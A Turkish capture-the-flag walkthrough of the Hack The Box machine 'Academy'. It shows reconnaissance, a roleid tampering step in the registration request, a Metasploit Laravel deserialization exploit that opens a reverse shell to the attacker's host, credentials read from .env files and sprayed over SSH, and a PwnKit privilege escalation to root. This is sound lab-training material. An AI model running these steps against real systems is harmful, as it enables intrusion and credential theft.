Şüphesiz ki sizi biraz korku ve açlık, ayrıca mallardan, canlardan ve ürünlerden azatma fakirlik ile imtihan edeceğiz. Sabredenlere müjdele...
Bakara 177
| Makine Adı | Seviye | OS | Logo |
|---|---|---|---|
| Academy - HTB | Kolay | Linux |
Walkthrough
nmap
nmap -p 22,80,33060 -A -T4 10.10.10.215
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 14:21 +03
Nmap scan report for academy.htb (10.10.10.215)
Host is up (0.22s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c090a3d835256ffa3306cf8013a0a553 (RSA)
| 256 2ad54bd046f0edc93c8df65dabae7796 (ECDSA)
|_ 256 e16414c3cc51b23ba628a7b1ae5f4535 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Hack The Box Academy
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.93%I=7%D=3/13%Time=640F0729%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 206.81 ms 10.10.14.1
2 206.90 ms academy.htb (10.10.10.215)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.55
Web sitesini bulduktan sonra fuff ile dosya dizin keşfi yapmaya kaar verdim. academy.htb domain ifadesini internet sitesinden almıştım. /etc/hosts dosyamı güncelledim ve taramayı başlattım. Ne zaman domain bulsam subdomian'de taraması yaparım ancak subdomain taramasında bir sonuç alamadım.
┌──(root㉿ARCELIK-RED-TEAM)-[/tmp]
└─# ffuf -u http://academy.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -e .php,.html,.txt -t 100 -c -fs 2117
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://academy.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
:: Extensions : .php .html .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 2117
________________________________________________
[Status: 302, Size: 55034, Words: 4001, Lines: 1050, Duration: 244ms]
* FUZZ: home.php
[Status: 200, Size: 2627, Words: 667, Lines: 142, Duration: 228ms]
* FUZZ: login.php
[Status: 200, Size: 3003, Words: 801, Lines: 149, Duration: 234ms]
* FUZZ: register.php
[Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 4657ms]
* FUZZ: .php
[Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 5660ms]
* FUZZ: .html
[Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 5681ms]
* FUZZ: images
[Status: 200, Size: 2633, Words: 668, Lines: 142, Duration: 227ms]
* FUZZ: admin.php
[Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 250ms]
* FUZZ: config.php
[Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 223ms]
* FUZZ: .php
[Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 223ms]
* FUZZ: .html
[Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 236ms]
* FUZZ: server-status
[WARN] Caught keyboard interrupt (Ctrl-C)
Sayfada bira gezindim kayıt olabiliyordum ve ama pek bir şey yapamaıyodum, kayıt olurken ilginç bir alan keşfettim. Kayıt olurken roleid değeri 0 larak setlenmişti bunu bir olarak değiştirip tekrardan kayıt olmayı denedim ve farklı bir sayfaya gittiğimi gördüm. İşte kayıt olurken kullandığım http paketi:
POST /register.php HTTP/1.1
Host: academy.htb
Content-Length: 47
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://academy.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://academy.htb/register.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=5hn6kt6c1ajp3at1q5ga022djr
Connection: close
roleid=1&uid=beren&password=beren&confirm=beren

dev-staging-01.academy.htb bilgisini hemen hosts dosyama ekledim ve bu sayfaya gittim. Sayfaya gittiğimde bir larevel olduğunu gördüm ve direkt olara aslında .env dosyası karşma çıkıyordu. Bunun üzerine Laravel ile ilgili exploitleri aramaya başladım.


Sırasıyla buradaki exploitleri msfconsole üzerinde aramaya başladım.
msfconsole
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v6.2.26-dev ]
+ -- --=[ 2264 exploits - 1190 auxiliary - 404 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Set the current module's RHOSTS with
database values using hosts -R or services
-R
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search cve:2022-2886
[-] No results from search
msf6 > search cve:2022-2870
[-] No results from search
msf6 > search cve:2021-21263
[-] No results from search
msf6 > search cve:2020-24941
[-] No results from search
msf6 > search cve:2018-15133
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/http/laravel_token_unserialize_exec 2018-08-07 excellent Yes PHP Laravel Framework token Unserialize Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/http/laravel_token_unserialize_exec
msf6 >
Bulduğum exploiti internette araştırdım ve denedim.
msf6 exploit(unix/http/laravel_token_unserialize_exec) > show options
Module options (exploit/unix/http/laravel_token_unserialize_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= no The base64 encoded APP_KEY string from the .env file
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.215 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to target webapp
VHOST dev-staging-01.academy.htb no HTTP server virtual host
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.22 yes The listen address (an interface may be specified)
LPORT 443 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(unix/http/laravel_token_unserialize_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.22:443
[*] Command shell session 4 opened (10.10.14.22:443 -> 10.10.10.215:46598) at 2023-03-28 16:01:23 +0300
Makineye bağlandıktan sonra bazı credentiallar buldum.
www-data@academy:/var/www/html/academy$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@academy:/var/www/html/academy$ cat .env
cat .env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost
LOG_CHANNEL=stack
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
SESSION_LIFETIME=120
QUEUE_DRIVER=sync
REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379
MAIL_DRIVER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null
PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1
MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
www-data@academy:/var/www/html/htb-academy-dev-01$ cat .env
cat .env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=true
APP_URL=http://localhost
LOG_CHANNEL=stack
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=homestead
DB_USERNAME=homestead
DB_PASSWORD=secret
BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
SESSION_LIFETIME=120
QUEUE_DRIVER=sync
REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379
MAIL_DRIVER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null
PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1
MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
/home klasörüne gidip mevcut kullanıcıların bilgilerini aldım ve ssh brute başlattım.
www-data@academy:/home$ ls
ls
total 32
drwxr-xr-x 8 root root 4096 Aug 10 2020 .
drwxr-xr-x 20 root root 4096 Feb 10 2021 ..
drwxr-xr-x 2 21y4d 21y4d 4096 Aug 10 2020 21y4d
drwxr-xr-x 2 ch4p ch4p 4096 Aug 10 2020 ch4p
drwxr-xr-x 4 cry0l1t3 cry0l1t3 4096 Aug 12 2020 cry0l1t3
drwxr-xr-x 3 egre55 egre55 4096 Aug 10 2020 egre55
drwxr-xr-x 2 g0blin g0blin 4096 Aug 10 2020 g0blin
drwxr-xr-x 5 mrb3n mrb3n 4096 Aug 12 2020 mrb3n
crackmapexec ssh 10.10.10.215 -u users -p passwords
SSH 10.10.10.215 22 10.10.10.215 [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1
SSH 10.10.10.215 22 10.10.10.215 [-] 21y4d:homestead Authentication failed.
SSH 10.10.10.215 22 10.10.10.215 [-] 21y4d:secret Authentication failed.
SSH 10.10.10.215 22 10.10.10.215 [-] 21y4d:mySup3rP4s5w0rd!! Authentication failed.
SSH 10.10.10.215 22 10.10.10.215 [-] 21y4d:academy Authentication failed.
SSH 10.10.10.215 22 10.10.10.215 [-] ch4p:homestead Authentication failed.
SSH 10.10.10.215 22 10.10.10.215 [-] ch4p:secret Authentication failed.
SSH 10.10.10.215 22 10.10.10.215 [-] ch4p:mySup3rP4s5w0rd!! Authentication failed.
SSH 10.10.10.215 22 10.10.10.215 [-] ch4p:academy Authentication failed.
SSH 10.10.10.215 22 10.10.10.215 [-] cry0l1t3:homestead Authentication failed.
SSH 10.10.10.215 22 10.10.10.215 [-] cry0l1t3:secret Authentication failed.
SSH 10.10.10.215 22 10.10.10.215 [+] cry0l1t3:mySup3rP4s5w0rd!!
Böylece ilk flagi okudum.
ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue 28 Mar 2023 01:44:49 PM UTC
System load: 0.0
Usage of /: 37.8% of 13.72GB
Memory usage: 24%
Swap usage: 0%
Processes: 239
Users logged in: 0
IPv4 address for ens160: 10.10.10.215
IPv6 address for ens160: dead:beef::250:56ff:feb9:e4e6
89 updates can be installed immediately.
42 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Aug 12 21:58:45 2020 from 10.10.14.2
$ id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
$ ls
user.txt
$ cat user.txt
8b8c9674b80280f44b5a35cdc3700602
İçeride linpeas.sh gibi çeşitli scriptler çalıştırdım ve cve buldum birkaçkere daha sonrasında buları exploit suggester ile de test ettim. Aşağıdaki zafiyetler tespit edildi.
exploit/linux/local/cve_2021_3493_overlayfs:
exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec:
exploit/linux/local/cve_2022_0995_watch_queue:
exploit/linux/local/su_login:
exploit/linux/local/ubuntu_enlightenment_mount_priv_esc:
Hedef makinede bir meterpreter başlattım, session'umu bakground'a atıp ilgili exploitleri denemeye başladım. Garip bir şekilde exploit fail etsede meterpreter root shell elde edbildim. Aşaıda ayrıntıları mevcut.
smsf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set lhost 10.10.14.22
lhost => 10.10.14.22
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set lport 443
lport => 443
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > exploit
[*] Started reverse TCP handler on 10.10.14.22:443
[*] Running automatic check ("set AutoCheck false" to disable)
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set autocheck false
autocheck => false
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > exploit
[*] Started reverse TCP handler on 10.10.14.22:443
[!] AutoCheck is disabled, proceeding with exploitation
[*] Writing '/tmp/.jebqbvylbqi/yjalol/yjalol.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.jebqbvylbqi
[*] Sending stage (3045348 bytes) to 10.10.10.215
[+] Deleted /tmp/.jebqbvylbqi/yjalol/yjalol.so
[+] Deleted /tmp/.jebqbvylbqi/.sjfgkae
[+] Deleted /tmp/.jebqbvylbqi
[*] Meterpreter session 2 opened (10.10.14.22:443 -> 10.10.10.215:44758) at 2023-03-28 18:22:21 +0300
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] exploit: Interrupted
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter python/linux cry0l1t3 @ academy 10.10.14.22:4444 -> 10.10.10.215:39386 (10.10.10.215)
2 meterpreter x64/linux root @ 10.10.10.215 10.10.14.22:443 -> 10.10.10.215:44758 (10.10.10.215)
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions 2
[*] Starting interaction with 2...
meterpreter > shell
Process 2282 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),4(adm),1002(cry0l1t3)
cd /root
ls
academy.txt
root.txt
snap
cat root.txt
6f07a193a4068439b60e5db25b84c9d3
İlk Yorumu Siz Yapın